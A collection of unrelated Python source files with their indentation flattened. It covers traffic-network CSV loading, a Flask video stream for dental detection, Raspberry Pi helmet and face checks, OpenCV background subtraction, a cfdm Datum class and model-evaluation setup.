src_stop_bin = src_start_bin + tocopy
# copy the data, if there's data that needs copying
if ((dst_stop_bin - dst_start_bin) > 0) and ((src_stop_bin - src_start_bin) > 0):
self.log("dst_psd[%d:%d] = src_psd[%d:%d]" % (dst_start_bin, dst_stop_bin, src_start_bin, src_stop_bin))
dst_psd[dst_start_bin:dst_stop_bin] = src_psd[src_start_bin:src_stop_bin]
|
65954
|
TEMPLATE = """import numpy as np
import unittest
from {name}.algorithm.research_algorithm import {name_upper}Estimator
class Test{name_upper}Estimator(unittest.TestCase):
def test_predict(self):
multiplier = 2
input_data = np.random.random([1, 2])
expected_result = input_data * multiplier
estimator = {name_upper}Estimator(multiplier=multiplier)
result = estimator.predict(input_data)
self.assertTrue(np.allclose(result, expected_result))
"""
def get_template(name: str):
return TEMPLATE.format(name=name.lower(),
name_upper=name.capitalize())
|
65969
|
import socket
from flask import Flask, Response
from PIL import Image, ImageDraw
import threading
from collections import deque
import struct
import io
HOST = '0.0.0.0'
PORT = 54321
image_bytes_length = 640*480*3
bbox_bytes_length = 5*8
# The socket client sends one bounding box and score.
data_bytes_length = image_bytes_length + bbox_bytes_length
app = Flask(__name__)
# The buffer that holds the most recent JPEG frame.
stream_buffer = deque(maxlen=1)
# global flag
should_capture = False
# The buffer that holds the most recent captured JPEG frame, which is either the first frame after the should_capture flag is set, or the latest frame showing a missing tooth.
capture_buffer = deque(maxlen=1)
# This functions returns an additional flag indicating whether a missing tooth bounding box has been drawn.
def to_jpeg(image_bytes, bbox_bytes):
# Unpack the bytes to a list of floats.
f = []
for i in range(5):
# Each float was encoded into 8 bytes.
float_bytes = bbox_bytes[8*i:8*(i+1)]
float_value, = struct.unpack('!d', float_bytes)
f.append(float_value)
# This buffer holds the JPEG image which will be a single frame of the streaming video.
bytes_buffer = io.BytesIO()
image = Image.frombytes('RGB', (640, 480), image_bytes, 'raw', 'RGB')
# Draw a box showing the part of the image that was sent to the model, with corner coordinates (0, 0) and (224, 224).
x1, y1, x2, y2 = (0.0, 0.0, 224.0, 224.0)
# These offsets invert the cropping in recognize.py:image_bytes_to_image.
x1 += 258
x2 += 258
y1 += 148
y2 += 148
draw = ImageDraw.Draw(image)
draw.line(xy=[(x1, y1), (x2, y1), (x2, y2), (x1, y2), (x1, y1)], fill=128, width=5)
del draw
# Draw an additional bounding box if a missing tooth was detected.
x1, y1, x2, y2, score = f
bbox_drawn = False
if score > 0.5:
bbox_drawn = True
# The coordinates from the DetectionEngine were normalized. Transform to the pixel scale before drawing.
x1 *= 224
x2 *= 224
y1 *= 224
y2 *= 224
# Place the cropped (224, 224) image back in the (640, 480) image at the corret position.
x1 += 258
x2 += 258
y1 += 148
y2 += 148
draw = ImageDraw.Draw(image)
draw.line(xy=[(x1, y1), (x2, y1), (x2, y2), (x1, y2), (x1, y1)], fill=128, width=5)
# Write image to the buffer and return the JPEG bytes.
image.save(bytes_buffer, format='JPEG')
frame = bytes_buffer.getvalue()
return frame, bbox_drawn
def server_worker(host, port, stream_buffer, capture_buffer):
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.bind((host, port))
s.listen()
print('Waiting for connection.')
conn, addr = s.accept()
with conn:
print('Client: {}'.format(addr))
while True:
try:
# image bytes and bounding box score bytes
data = conn.recv(data_bytes_length)
if data and len(data) == data_bytes_length:
image_bytes = data[:image_bytes_length]
bbox_bytes = data[image_bytes_length:]
frame, bbox_drawn = to_jpeg(image_bytes, bbox_bytes)
stream_buffer.append(frame)
# update the frame in capture_buffer if:
# (a) should_capture is True and capture_buffer is empty; or
# (b) should_capture is True and bbox_drawn is True
should_update = should_capture and (bbox_drawn or not capture_buffer)
if should_update:
capture_buffer.append(frame)
except Exception as e:
print(repr(e))
break
def make_generator(buffer_):
while True:
if buffer_:
# peek instead of pop, since the buffer may not always be updated
frame = buffer_[-1]
else:
continue
yield (b'--frame\r\n'
b'Content-Type: image/jpeg\r\n\r\n' + frame + b'\r\n')
@app.route('/video')
def video():
generator = make_generator(stream_buffer)
return Response(generator,
mimetype='multipart/x-mixed-replace; boundary=frame')
@app.route('/capture')
def capture():
generator = make_generator(capture_buffer)
return Response(generator,
mimetype='multipart/x-mixed-replace; boundary=frame')
@app.route('/start_capture')
def start_capture():
# We're clearing the capture buffer here because the logic while capturing
# is to only grab a buffer frame if the buffer is empty or missing teeth
# is detected, and we want to be sure to grab a fresh still each time even
# when no teeth are detected
global capture_buffer
capture_buffer.clear()
global should_capture
should_capture = True
return 'OK', 200
@app.route('/stop_capture')
def stop_capture():
global should_capture
should_capture = False
return 'OK', 200
@app.route('/')
def index():
return 'OK', 200
if __name__ == '__main__':
thread = threading.Thread(target=server_worker, args=(HOST, PORT, stream_buffer, capture_buffer))
thread.start()
app.run(host='0.0.0.0', debug=False)
thread.join()
|
66009
|
import os
import csv
import threading
from .classes import Node, Link, Network, Column, ColumnVec, VDFPeriod, \
AgentType, DemandPeriod, Demand, Assignment, UI
from .colgen import update_links_using_columns
from .consts import SMALL_DIVISOR
__all__ = [
'read_network',
'load_columns',
'output_columns',
'output_link_performance',
'download_sample_data_sets',
'output_agent_paths'
]
# for precheck on connectivity of each OD pair
# 0: isolated, has neither outgoing links nor incoming links
# 1: has at least one outgoing link
# 2: has at least one incoming link
# 3: has both outgoing and incoming links
_zone_degrees = {}
def _update_orig_zone(oz_id):
if oz_id not in _zone_degrees:
_zone_degrees[oz_id] = 1
elif _zone_degrees[oz_id] == 2:
_zone_degrees[oz_id] = 3
def _update_dest_zone(dz_id):
if dz_id not in _zone_degrees:
_zone_degrees[dz_id] = 2
elif _zone_degrees[dz_id] == 1:
_zone_degrees[dz_id] = 3
def _are_od_connected(oz_id, dz_id):
connected = True
# at least one node in O must have outgoing links
if oz_id not in _zone_degrees or _zone_degrees[oz_id] == 2:
connected = False
print(f'WARNING! {oz_id} has no outgoing links to route volume '
f'between OD: {oz_id} --> {dz_id}')
# at least one node in D must have incoming links
if dz_id not in _zone_degrees or _zone_degrees[dz_id] == 1:
if connected:
connected = False
print(f'WARNING! {dz_id} has no incoming links to route volume '
f'between OD: {oz_id} --> {dz_id}')
return connected
def _convert_str_to_int(str):
"""
TypeError will take care the case that str is None
ValueError will take care the case that str is empty
"""
if not str:
return None
try:
return int(str)
except ValueError:
return int(float(str))
except TypeError:
return None
def _convert_str_to_float(str):
"""
TypeError will take care the case that str is None
ValueError will take care the case that str is empty
"""
if not str:
return None
try:
return float(str)
except (TypeError, ValueError):
return None
def _download_url(url, filename, loc_dir):
try:
import requests
except ImportError:
print('please print requests to preceed downloading!!')
try:
r = requests.get(url)
r.raise_for_status()
with open(loc_dir+filename, 'wb') as f:
f.write(r.content)
except requests.HTTPError:
print('file not existing: '+url)
except requests.ConnectionError:
raise Exception('check your connectcion!!!')
except Exception as e:
raise e
def download_sample_data_sets():
url = 'https://raw.githubusercontent.com/jdlph/Path4GMNS/master/data/'
data_sets = [
"ASU",
"Braess_Paradox",
"Chicago_Sketch",
"Lima_Network",
"Sioux_Falls",
"Two_Corridor"
]
files = [
"node.csv",
"link.csv",
"demand.csv",
"settings.csv",
"settings.yml"
]
print('downloading starts')
# data folder under cdw
loc_data_dir = 'data'
if not os.path.isdir(loc_data_dir):
os.mkdir(loc_data_dir)
for ds in data_sets:
web_dir = url + ds + '/'
loc_sub_dir = os.path.join(loc_data_dir, ds) + '/'
if not os.path.isdir(loc_sub_dir):
os.mkdir(loc_sub_dir)
# multi-threading
threads = []
for x in files:
t = threading.Thread(
target=_download_url,
args=(web_dir+x, x, loc_sub_dir)
)
t.start()
threads.append(t)
for t in threads:
t.join()
print('downloading completes')
print('check '+os.path.join(os.getcwd(), loc_data_dir)+' for downloaded data sets')
def read_nodes(input_dir,
nodes,
id_to_no_dict,
no_to_id_dict,
zone_to_node_dict):
""" step 1: read input_node """
with open(input_dir+'/node.csv', 'r') as fp:
print('read node.csv')
reader = csv.DictReader(fp)
node_seq_no = 0
for line in reader:
# set up node_id, which should be an integer
node_id = _convert_str_to_int(line['node_id'])
if node_id is None:
continue
# set up zone_id, which should be an integer
zone_id = _convert_str_to_int(line['zone_id'])
if zone_id is None:
zone_id = -1
# treat them as string
coord_x = line['x_coord']
coord_y = line['y_coord']
# construct node object
node = Node(node_seq_no, node_id, zone_id, coord_x, coord_y)
nodes.append(node)
# set up mapping between node_seq_no and node_id
id_to_no_dict[node_id] = node_seq_no
no_to_id_dict[node_seq_no] = node_id
# associate node_id with corresponding zone
if zone_id not in zone_to_node_dict.keys():
zone_to_node_dict[zone_id] = []
zone_to_node_dict[zone_id].append(node_id)
node_seq_no += 1
print(f'the number of nodes is {node_seq_no}')
zone_size = len(zone_to_node_dict)
# do not count virtual zone with id as -1
if -1 in zone_to_node_dict.keys():
zone_size -= 1
print(f'the number of zones is {zone_size}')
def read_links(input_dir,
links,
nodes,
id_to_no_dict,
link_id_dict,
agent_type_size,
demand_period_size,
load_demand):
""" step 2: read input_link """
with open(input_dir+'/link.csv', 'r') as fp:
print('read link.csv')
reader = csv.DictReader(fp)
link_seq_no = 0
for line in reader:
# it can be an empty string
link_id = line['link_id']
# check the validity
from_node_id = _convert_str_to_int(line['from_node_id'])
if from_node_id is None:
continue
to_node_id =_convert_str_to_int(line['to_node_id'])
if to_node_id is None:
continue
length = _convert_str_to_float(line['length'])
if length is None:
continue
# pass validity check
try:
from_node_no = id_to_no_dict[from_node_id]
to_node_no = id_to_no_dict[to_node_id]
except KeyError:
print(f'EXCEPTION: Node ID {from_node_id} '
f'or/and Node ID {to_node_id} NOT IN THE NETWORK!!')
continue
# for the following attributes,
# if they are not None, convert them to the corresponding types
# if they are None's, set them using the default values
lanes = _convert_str_to_int(line['lanes'])
if lanes is None:
lanes = 1
link_type = _convert_str_to_int(line['link_type'])
if link_type is None:
link_type = 1
free_speed = _convert_str_to_int(line['free_speed'])
if free_speed is None:
free_speed = 60
# issue: int??
capacity = _convert_str_to_int(line['capacity'])
if capacity is None:
capacity = 49500
# if link.csv does not have no column 'allowed_uses',
# set allowed_uses to 'all'
# developer's note:
# we may need to change this implementation as we cannot deal with
# cases a link which is not open to any modes
try:
allowed_uses = line['allowed_uses']
if not allowed_uses:
allowed_uses = 'all'
except KeyError:
allowed_uses = 'all'
# if link.csv does not have no column 'geometry',
# set geometry to ''
try:
geometry = line['geometry']
except KeyError:
geometry = ''
link_id_dict[link_id] = link_seq_no
# construct link object
link = Link(link_id,
link_seq_no,
from_node_no,
to_node_no,
from_node_id,
to_node_id,
length,
lanes,
link_type,
free_speed,
capacity,
allowed_uses,
geometry,
agent_type_size,
demand_period_size)
# VDF Attributes
for i in range(demand_period_size):
dp_id_str = str(i+1)
header_vdf_alpha = 'VDF_alpha' + dp_id_str
header_vdf_beta = 'VDF_beta' + dp_id_str
header_vdf_mu = 'VDF_mu' + dp_id_str
header_vdf_fftt = 'VDF_fftt' + dp_id_str
header_vdf_cap = 'VDF_cap' + dp_id_str
header_vdf_phf = 'VDF_phf' + dp_id_str
# case i: link.csv does not VDF attributes at all
# case ii: link.csv only has partial VDF attributes
# under case i, we will set up only one VDFPeriod object using
# default values
# under case ii, we will set up some VDFPeriod objects up to
# the number of complete set of VDF_alpha, VDF_beta, and VDF_mu
try:
VDF_alpha = line[header_vdf_alpha]
if VDF_alpha:
VDF_alpha = float(VDF_alpha)
except (KeyError, TypeError):
if i == 0:
# default value will be applied in the constructor
VDF_alpha = 0.15
else:
break
try:
VDF_beta = line[header_vdf_beta]
if VDF_beta:
VDF_beta = float(VDF_beta)
except (KeyError, TypeError):
if i == 0:
# default value will be applied in the constructor
VDF_beta = 4
else:
break
try:
VDF_mu = line[header_vdf_mu]
if VDF_mu:
VDF_mu = float(VDF_mu)
except (KeyError, TypeError):
if i == 0:
# default value will be applied in the constructor
VDF_mu = 1000
else:
break
try:
VDF_fftt = line[header_vdf_fftt]
if VDF_fftt:
VDF_fftt = float(VDF_fftt)
except (KeyError, TypeError):
# set it up using length and free_speed from link
VDF_fftt = length / max(SMALL_DIVISOR, free_speed) * 60
try:
VDF_cap = line[header_vdf_cap]
if VDF_cap:
VDF_cap = float(VDF_cap)
except (KeyError, TypeError):
# set it up using capacity from link
VDF_cap = capacity
# not a mandatory column
try:
VDF_phf = line[header_vdf_phf]
if VDF_phf:
VDF_phf = float(VDF_phf)
except (KeyError, TypeError):
# default value will be applied in the constructor
VDF_phf = -1
# construct VDFPeriod object
vdf = VDFPeriod(i, VDF_alpha, VDF_beta, VDF_mu,
VDF_fftt, VDF_cap, VDF_phf)
link.vdfperiods.append(vdf)
# set up outgoing links and incoming links
from_node = nodes[from_node_no]
to_node = nodes[to_node_no]
from_node.add_outgoing_link(link)
to_node.add_incoming_link(link)
links.append(link)
# set up zone degrees
if load_demand:
oz_id = from_node.get_zone_id()
dz_id = to_node.get_zone_id()
_update_orig_zone(oz_id)
_update_dest_zone(dz_id)
link_seq_no += 1
print(f'the number of links is {link_seq_no}')
def read_demand(input_dir,
file,
agent_type_id,
demand_period_id,
zone_to_node_dict,
column_pool):
""" step 3:read input_agent """
with open(input_dir+'/'+file, 'r') as fp:
print('read '+file)
at = agent_type_id
dp = demand_period_id
reader = csv.DictReader(fp)
total_agents = 0
for line in reader:
# invalid origin zone id, discard it
oz_id = _convert_str_to_int(line['o_zone_id'])
if oz_id is None:
continue
# invalid destination zone id, discard it
dz_id = _convert_str_to_int(line['d_zone_id'])
if dz_id is None:
continue
# o_zone_id does not exist in node.csv, discard it
if oz_id not in zone_to_node_dict.keys():
continue
# d_zone_id does not exist in node.csv, discard it
if dz_id not in zone_to_node_dict.keys():
continue
volume = _convert_str_to_float(line['volume'])
if volume is None:
continue
if volume == 0:
continue
# precheck on connectivity of each OD pair
if not _are_od_connected(oz_id, dz_id):
continue
# set up volume for ColumnVec
if (at, dp, oz_id, dz_id) not in column_pool.keys():
column_pool[(at, dp, oz_id, dz_id)] = ColumnVec()
column_pool[(at, dp, oz_id, dz_id)].od_vol += volume
total_agents += int(volume + 1)
print(f'the number of agents is {total_agents}')
if total_agents == 0:
raise Exception('NO VALID OD VOLUME!! DOUBLE CHECK YOUR demand.csv')
def _auto_setup(assignment):
""" automatically set up one demand period and one agent type
The two objects will be set up using the default constructors using the
default values. See class DemandPeriod and class AgentType for details
"""
at = AgentType()
dp = DemandPeriod()
d = Demand()
assignment.update_agent_types(at)
assignment.update_demand_periods(dp)
assignment.update_demands(d)
def read_settings(input_dir, assignment):
try:
import yaml as ym
with open(input_dir+'/settings.yml') as file:
settings = ym.full_load(file)
# agent types
agents = settings['agents']
for i, a in enumerate(agents):
agent_type = a['type']
agent_name = a['name']
agent_vot = a['vot']
agent_flow_type = a['flow_type']
agent_pce = a['pce']
agent_ffs = a['free_speed']
at = AgentType(i,
agent_type,
agent_name,
agent_vot,
agent_flow_type,
agent_pce,
agent_ffs)
assignment.update_agent_types(at)
# demand periods
demand_periods = settings['demand_periods']
for i, d in enumerate(demand_periods):
period = d['period']
time_period = d['time_period']
dp = DemandPeriod(i, period, time_period)
assignment.update_demand_periods(dp)
# demand files
demands = settings['demand_files']
for i, d in enumerate(demands):
demand_file = d['file_name']
# demand_format_type = d['format_type']
demand_period = d['period']
demand_type = d['agent_type']
demand = Demand(i, demand_period, demand_type, demand_file)
assignment.update_demands(demand)
except ImportError:
# just in case user does not have pyyaml installed
print('Please install pyyaml next time!')
print('Engine will set up one demand period and one agent type using '
'default values for you, which might NOT reflect your case!\n')
_auto_setup(assignment)
except FileNotFoundError:
# just in case user does not provide settings.yml
print('Please provide settings.yml next time!')
print('Engine will set up one demand period and one agent type using '
'default values for you, which might NOT reflect your case!\n')
_auto_setup(assignment)
except Exception as e:
raise e
def read_network(load_demand='true', input_dir='.'):
assignm = Assignment()
network = Network()
read_settings(input_dir, assignm)
read_nodes(input_dir,
network.node_list,
network.node_id_to_no_dict,
network.node_no_to_id_dict,
network.zone_to_nodes_dict)
read_links(input_dir,
network.link_list,
network.node_list,
network.node_id_to_no_dict,
network.link_id_dict,
assignm.get_agent_type_count(),
assignm.get_demand_period_count(),
load_demand)
if load_demand:
for d in assignm.get_demands():
at = assignm.get_agent_type_id(d.get_agent_type_str())
dp = assignm.get_demand_period_id(d.get_period())
read_demand(input_dir,
d.get_file_name(),
at,
dp,
network.zone_to_nodes_dict,
assignm.column_pool)
network.update(assignm.get_agent_type_count(),
assignm.get_demand_period_count())
assignm.network = network
assignm.setup_spnetwork()
ui = UI(assignm)
return ui
def load_columns(ui, input_dir='.'):
""" developer note: do we use agent.csv to set up network? """
with open(input_dir+'/agent.csv', 'r') as f:
print('read agent.csv')
A = ui._base_assignment
reader = csv.DictReader(f)
# just in case agent_id was not outputed
last_agent_id = 0
for line in reader:
# critical info
oz_id = _convert_str_to_int(line['o_zone_id'])
if oz_id is None:
continue
dz_id = _convert_str_to_int(line['d_zone_id'])
if dz_id is None:
continue
node_seq = line['node_sequence']
if node_seq is None:
continue
link_seq = line['link_sequence']
if link_seq is None:
continue
# non-critical info
agent_id = _convert_str_to_int(line['agent_id'])
if agent_id is None:
agent_id = last_agent_id + 1
last_agent_id = agent_id
# it could be empty
# path_id = line['path_id']
at = line['agent_type']
if not at:
continue
else:
at = A.get_agent_type_id(at)
dp = line['demand_period']
if not dp:
continue
else:
dp = A.get_demand_period_id(dp)
vol = _convert_str_to_float(line['volume'])
if vol is None:
continue
toll = _convert_str_to_float(line['toll'])
if toll is None:
toll = 0
tt = _convert_str_to_float(line['travel_time'])
if tt is None:
tt = 0
dist = _convert_str_to_float(line['distance'])
if dist is None:
dist = 0
# it could be empty
geo = line['geometry']
if (at, dp, oz_id, dz_id) not in A.get_column_pool().keys():
continue
cv = A.get_column_vec(at, dp, oz_id, dz_id)
node_path = None
try:
# if x is only needed for columns generated from DTALite,
# which have the trailing ';' and leads to '' after split
node_path = [int(x) for x in node_seq.split(';') if x]
except ValueError:
raise Exception(
f'INVALID NODE PATH found for agent id: {agent_id}'
)
node_sum = sum(node_path)
if node_sum not in cv.path_node_seq_map.keys():
path_seq_no = cv.get_column_num()
col = Column(path_seq_no)
try:
col.nodes = [A.get_node_no(x) for x in node_path]
except IndexError:
raise Exception(
'Invalid node found on column!!'
'Did you use agent.csv from a different network?'
)
try:
# if x is only needed for columns generated from DTALite,
# which have the trailing ';' and leads to '' after split
col.links = [
A.get_link_seq_no(x) for x in link_seq.split(';') if x
]
except IndexError:
raise Exception(
'INVALID link found on column!!'
'Did you use agent.csv from a different network?'
)
except ValueError:
raise Exception(
f'INVALID LINK PATH found for agent id: {agent_id}'
)
# the following four are non-critical info
col.set_toll(toll)
col.set_travel_time(tt)
col.set_geometry(geo)
if dist == 0:
sum(A.get_link(x).get_length() for x in col.links)
col.set_distance(dist)
cv.add_new_column(node_sum, col)
cv.get_column(node_sum).increase_volume(vol)
update_links_using_columns(ui)
def output_columns(ui, output_geometry=True, output_dir='.'):
with open(output_dir+'/agent.csv', 'w', newline='') as fp:
base = ui._base_assignment
nodes = base.get_nodes()
links = base.get_links()
column_pool = base.get_column_pool()
writer = csv.writer(fp)
line = ['agent_id',
'o_zone_id',
'd_zone_id',
'path_id',
'agent_type',
'demand_period',
'volume',
'toll',
'travel_time',
'distance',
'node_sequence',
'link_sequence',
'geometry']
writer.writerow(line)
path_sep = ';'
i = 0
for k, cv in column_pool.items():
if cv.get_od_volume() <= 0:
continue
# k = (at_id, dp_id, oz_id, dz_id)
at_id = k[0]
dp_id = k[1]
oz_id = k[2]
dz_id = k[3]
at_str = base.get_agent_type_str(at_id)
dp_str = base.get_demand_period_str(dp_id)
for col in cv.get_columns().values():
i += 1
node_seq = path_sep.join(
str(nodes[x].get_node_id()) for x in reversed(col.nodes)
)
link_seq = path_sep.join(
str(links[x].get_link_id()) for x in reversed(col.links)
)
geometry = ''
if output_geometry:
geometry = ', '.join(
nodes[x].get_coordinate() for x in reversed(col.nodes)
)
geometry = 'LINESTRING (' + geometry + ')'
line = [i,
oz_id,
dz_id,
col.get_seq_no(),
at_str,
dp_str,
col.get_volume(),
col.get_toll(),
col.get_travel_time(),
col.get_distance(),
node_seq,
link_seq,
geometry]
writer.writerow(line)
if output_dir == '.':
print('\ncheck agent.csv in '
+os.getcwd()+' for path finding results')
else:
print('\ncheck agent.csv in '
+os.path.join(os.getcwd(), output_dir)
+' for path finding results')
def output_link_performance(ui, output_dir='.'):
with open(output_dir+'/link_performance.csv', 'w', newline='') as fp:
base = ui._base_assignment
links = base.get_links()
writer = csv.writer(fp)
line = ['link_id',
'from_node_id',
'to_node_id',
'time_period',
'volume',
'travel_time',
'speed',
'VOC',
'queue',
'density',
'geometry',
'notes']
writer.writerow(line)
for link in links:
for dp in base.get_demand_periods():
avg_travel_time = link.get_period_avg_travel_time(dp.get_id())
speed = link.get_length() / (max(SMALL_DIVISOR, avg_travel_time) / 60)
line = [link.get_link_id(),
link.get_from_node_id(),
link.get_to_node_id(),
dp.get_period(),
link.get_period_flow_vol(dp.get_id()),
avg_travel_time,
speed,
link.get_period_voc(dp.get_id()),
'',
'',
link.get_geometry(),
'']
writer.writerow(line)
if output_dir == '.':
print('\ncheck link_performance.csv in '
+os.getcwd()+' for link performance')
else:
print('\ncheck link_performance.csv in '
+os.path.join(os.getcwd(), output_dir)
+' for link performance')
def output_agent_paths(ui, output_geometry=True, output_dir='.'):
with open(output_dir+'/agent_paths.csv', 'w', newline='') as f:
writer = csv.writer(f)
line = ['agent_id',
'o_zone_id',
'd_zone_id',
'path_id',
'agent_type',
'demand_period',
'volume',
'toll',
'travel_time',
'distance',
'node_sequence',
'link_sequence',
'geometry']
writer.writerow(line)
base = ui._base_assignment
nodes = base.get_nodes()
agents = base.get_agents()
agents.sort(key=lambda agent: agent.get_orig_node_id())
pre_dest_node_id = -1
for a in agents:
if not a.get_node_path():
continue
if a.get_dest_node_id() == pre_dest_node_id:
continue
pre_dest_node_id = a.get_dest_node_id()
agent_id = a.get_id()
geometry = ''
if output_geometry:
geometry = ', '.join(
nodes[x].get_coordinate() for x in reversed(a.get_node_path())
)
geometry = 'LINESTRING (' + geometry + ')'
line = [agent_id,
a.get_orig_zone_id(),
a.get_dest_zone_id(),
0,
'N/A',
'N/A',
'N/A',
'N/A',
'N/A',
a.get_path_cost(),
base.get_agent_node_path(agent_id, True),
base.get_agent_link_path(agent_id, True),
geometry]
writer.writerow(line)
if output_dir == '.':
print('\ncheck agent_paths.csv in '
+os.getcwd()+' for unique agent paths')
else:
print('\ncheck agent_paths.csv in '
+os.path.join(os.getcwd(), output_dir)
+' for unique agent paths')
|
66013
|
from PIL import Image
from tflite_runtime.interpreter import Interpreter
from tflite_runtime.interpreter import load_delegate
from video import create_capture
import numpy as np
import cv2 as cv
import io
import picamera
import simpleaudio as sa
# tf model upload
def load_labels(path):
with open(path, 'r') as f:
return {i: line.strip() for i, line in enumerate(f.readlines())}
def set_input_tensor(interpreter, image):
tensor_index = interpreter.get_input_details()[0]['index']
input_tensor = interpreter.tensor(tensor_index)()[0]
input_tensor[:, :] = image
# check whether user wears helmet
def classify_image(interpreter, image, top_k=1):
set_input_tensor(interpreter, image)
interpreter.invoke()
output_details = interpreter.get_output_details()[0]
output = np.squeeze(interpreter.get_tensor(output_details['index']))
# If the model is quantized (uint8 data), then dequantize the results
if output_details['dtype'] == np.uint8:
scale, zero_point = output_details['quantization']
output = scale * (output - zero_point)
ordered = np.argpartition(-output, top_k)
# if 0.90 above then regard user is wearing a helmet
if (top_k==1) and (output[1] > 0.9):
res = 1
else:
res = 0
return res
# for detect human face
def detect(img, cascade):
rects = cascade.detectMultiScale(img, scaleFactor=1.3, minNeighbors=4, minSize=(30, 30), flags=cv.CASCADE_SCALE_IMAGE)
if len(rects) == 0:
return []
rects[:,2:] += rects[:,:2]
return rects
def main():
import sys, getopt
checknum = 0
while True:
try:
# face recognizing code
print('face camera ')
args, video_src = getopt.getopt(sys.argv[1:2], '', ['cascade=', 'nested-cascade='])
try:
video_src = video_src[0]
except:
video_src = 0
args = dict(args)
cascade_fn = args.get('--cascade', "data/haarcascades/haarcascade_frontalface_alt.xml")
nested_fn = args.get('--nested-cascade', "data/haarcascades/haarcascade_eye.xml")
cascade = cv.CascadeClassifier(cv.samples.findFile(cascade_fn))
nested = cv.CascadeClassifier(cv.samples.findFile(nested_fn))
cam = create_capture(video_src, fallback='synth:bg={}:noise=0.05'.format(cv.samples.findFile('samples/data/lena.jpg')))
while True:
ret, img = cam.read()
gray = cv.cvtColor(img, cv.COLOR_BGR2GRAY)
gray = cv.equalizeHist(gray)
rects = detect(gray, cascade)
vis = img.copy()
if len(rects):
if not nested.empty():
print('into nested') # 사람이 들어왔을 때
for x1, y1, x2, y2 in rects:
roi = gray[y1:y2, x1:x2]
vis_roi = vis[y1:y2, x1:x2]
print('findrects')
subrects = detect(roi.copy(), nested)
if subrects!='[]':
faceok = 'faceok.wav'
fa = sa.WaveObject.from_wave_file(faceok)
face = fa.play()
face.wait_done()
print('detect!!')
break
cam.release() # face recognition camera off
print("helmet camera")
# helmet detectecting code
filename = 'helmet.wav'
wave_obj = sa.WaveObject.from_wave_file(filename)
helmetok = 'helmetok.wav'
wave = sa.WaveObject.from_wave_file(helmetok)
labels = "labels.txt"
model = "model_edgetpu.tflite"
interpreter = Interpreter(model, experimental_delegates=[load_delegate('libedgetpu.so.1.0')])
interpreter.allocate_tensors()
_, height, width, _ = interpreter.get_input_details()[0]['shape']
# helmet detect camera on
with picamera.PiCamera(resolution=(640, 480), framerate=30) as camera:
camera.start_preview()
try:
stream = io.BytesIO()
for _ in camera.capture_continuous(stream, format='jpeg', use_video_port=True):
stream.seek(0)
image = Image.open(stream).convert('RGB').resize((width, height),Image.ANTIALIAS)
results = classify_image(interpreter, image)
print("result:")
print(results)
stream.seek(0)
stream.truncate()
# 헬멧 착용여부 판단
if results==0:
play_obj = wave_obj.play()
play_obj.wait_done()
checknum += 1
if checknum==3:
checknum = 0
break;
else:
helm = wave.play()
helm.wait_done()
print('GoodBoy')
break
finally:
camera.stop_preview()
except KeyboardInterrupt:
break
if __name__ == '__main__':
main()
cv.destroyAllWindows()
|
66034
|
import re
def parseDeviceId(id):
match = re.search('(#|\\\\)vid_([a-f0-9]{4})&pid_([a-f0-9]{4})(&|#|\\\\)', id, re.IGNORECASE)
return [int(match.group(i), 16) if match else None for i in [2, 3]]
|
66043
|
import cv2
import numpy as np
# Capture the input frame
def get_frame(cap, scaling_factor=0.5):
ret, frame = cap.read()
# Resize the frame
frame = cv2.resize(frame, None, fx=scaling_factor,
fy=scaling_factor, interpolation=cv2.INTER_AREA)
return frame
if __name__=='__main__':
# Initialize the video capture object
cap = cv2.VideoCapture(1)
# Create the background subtractor object
bgSubtractor = cv2.createBackgroundSubtractorMOG2()
# This factor controls the learning rate of the algorithm.
# The learning rate refers to the rate at which your model
# will learn about the background. Higher value for
# 'history' indicates a slower learning rate. You
# can play with this parameter to see how it affects
# the output.
history = 100
# Iterate until the user presses the ESC key
while True:
frame = get_frame(cap, 0.5)
# Apply the background subtraction model to the input frame
mask = bgSubtractor.apply(frame, learningRate=1.0/history)
# Convert from grayscale to 3-channel RGB
mask = cv2.cvtColor(mask, cv2.COLOR_GRAY2BGR)
cv2.imshow('Input frame', frame)
cv2.imshow('Moving Objects MOG', mask & frame)
# Check if the user pressed the ESC key
c = cv2.waitKey(delay=30)
if c == 27:
break
cap.release()
cv2.destroyAllWindows()
|
66047
|
from . import core, mixin
class Datum(mixin.Parameters, mixin.NetCDFVariable, core.Datum):
"""A datum component of a CF data model coordinate reference.
A datum is a complete or partial definition of the zeroes of the
dimension and auxiliary coordinate constructs which define a
coordinate system.
The datum may contain the definition of a geophysical surface
which corresponds to the zero of a vertical coordinate construct,
and this may be required for both horizontal and vertical
coordinate systems.
Elements of the datum not specified may be implied by the
properties of the dimension and auxiliary coordinate constructs
referenced by the `CoordinateReference` instance that contains the
datum.
**NetCDF interface**
{{netCDF variable}}
.. versionadded:: (cfdm) 1.7.0
"""
def __init__(self, parameters=None, source=None, copy=True):
"""**Initialisation**
:Parameters:
parameters: `dict`, optional
Set parameters. The dictionary keys are parameter
names, with corresponding values. Ignored if the
*source* parameter is set.
Parameters may also be set after initialisation with
the `set_parameters` and `set_parameter` methods.
*Parameter example:*
``parameters={'earth_radius': 6371007.}``
source: optional
Initialise the parameters from those of *source*.
{{init source}}
{{init copy: `bool`, optional}}
"""
super().__init__(parameters=parameters, source=source, copy=copy)
self._initialise_netcdf(source)
|
66116
|
from models.rnn_mlp import RNN_MLP
from models.social_attention import SocialAttention
from models.cnn_mlp import CNN_MLP
from models.spatial_attention import SpatialAttention
from models.s2s_spatial_attention import S2sSpatialAtt
from models.s2s_social_attention import S2sSocialAtt
import time
import json
import torch
import sys
import helpers.helpers_training as helpers
import helpers.helpers_evaluation as helpers_evaluation
import torch.nn as nn
import numpy as np
import os
def main():
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
torch.manual_seed(42)
#loading parameters
parameters_path = "./src/parameters/project.json"
parameters_project = json.load(open(parameters_path))
data_processed_parameters = json.load(open(parameters_project["data_processed_parameters"]))
evaluation_parameters = json.load(open(parameters_project["evaluation_parameters"]))
processed_parameters = json.load(open(parameters_project["data_processed_parameters"]))
# loading training data
data_file = parameters_project["hdf5_samples"]
# scene lists for train, eval and test
eval_scenes = data_processed_parameters["eval_scenes"]
train_eval_scenes = data_processed_parameters["train_scenes"]
test_scenes = data_processed_parameters["test_scenes"]
train_scenes = [scene for scene in train_eval_scenes if scene not in eval_scenes]
scenes = [train_eval_scenes,train_scenes,test_scenes,eval_scenes]
report_name = evaluation_parameters["report_name"]
model_name = evaluation_parameters["model_name"]
models_path = parameters_project["models_evaluation"] + "{}.tar".format(model_name)
print("loading trained model {}".format(model_name))
net = None
